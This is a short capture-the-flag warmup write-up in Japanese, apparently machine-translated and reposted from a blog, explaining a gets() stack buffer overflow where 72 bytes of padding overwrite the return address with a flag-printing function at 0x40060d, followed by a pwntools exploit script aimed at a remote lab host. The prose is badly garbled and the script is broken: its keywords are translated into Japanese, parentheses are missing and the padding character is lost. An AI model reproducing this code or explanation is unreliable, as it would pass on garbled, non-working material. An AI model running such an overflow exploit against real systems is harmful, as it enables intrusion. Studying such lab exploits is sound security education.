XCTFのウォームアップは、最大書き込み

へのアドレスとポート番号についてのNC

 

 ソースファイルを見てください

 

、この関数は通常、おそらくバッファオーバーフローの脆弱性を参照してくださいおなじみの取得()関数を参照してください、V5の40Hは、ストレージスペースを開いたように、プログラムを見ることができるので、入力がオーバーフローを引き起こす可能性があります長い40H以上である、(スプリントを見て)機能

この関数はフラグキーポイントを得ることであることを確認することができ、我々は現在、プログラムはここで、ほぼ透明なアイデアをこの機能、すなわち0x40060dの位置をプリントアウトし、我々はオーバーフロー位置、この関数のアドレスへのリターンアドレスを制御する必要があります戻り値は、RBP + 8の機能を配置するので、オーバーフローポイントを算出してもよい:40H + 8H = 48H = 72

EXP:

!は/ usr / binに/のenvのpython 
#のコーディング= UTF-8 
から PWN インポート *の
コンテキスト(アーチ = ' AMD64 '、OS = ' Linuxの' 
SH =リモート(' 111.198.29.45 '、56844 
の目標 = 0x40060d 
SH。 sendline(' ' * 72 + P64(ターゲット))
sh.interactive()

 

 こんにちはフラグを言及。

おすすめ

転載: www.cnblogs.com/mzstar/p/11729969.html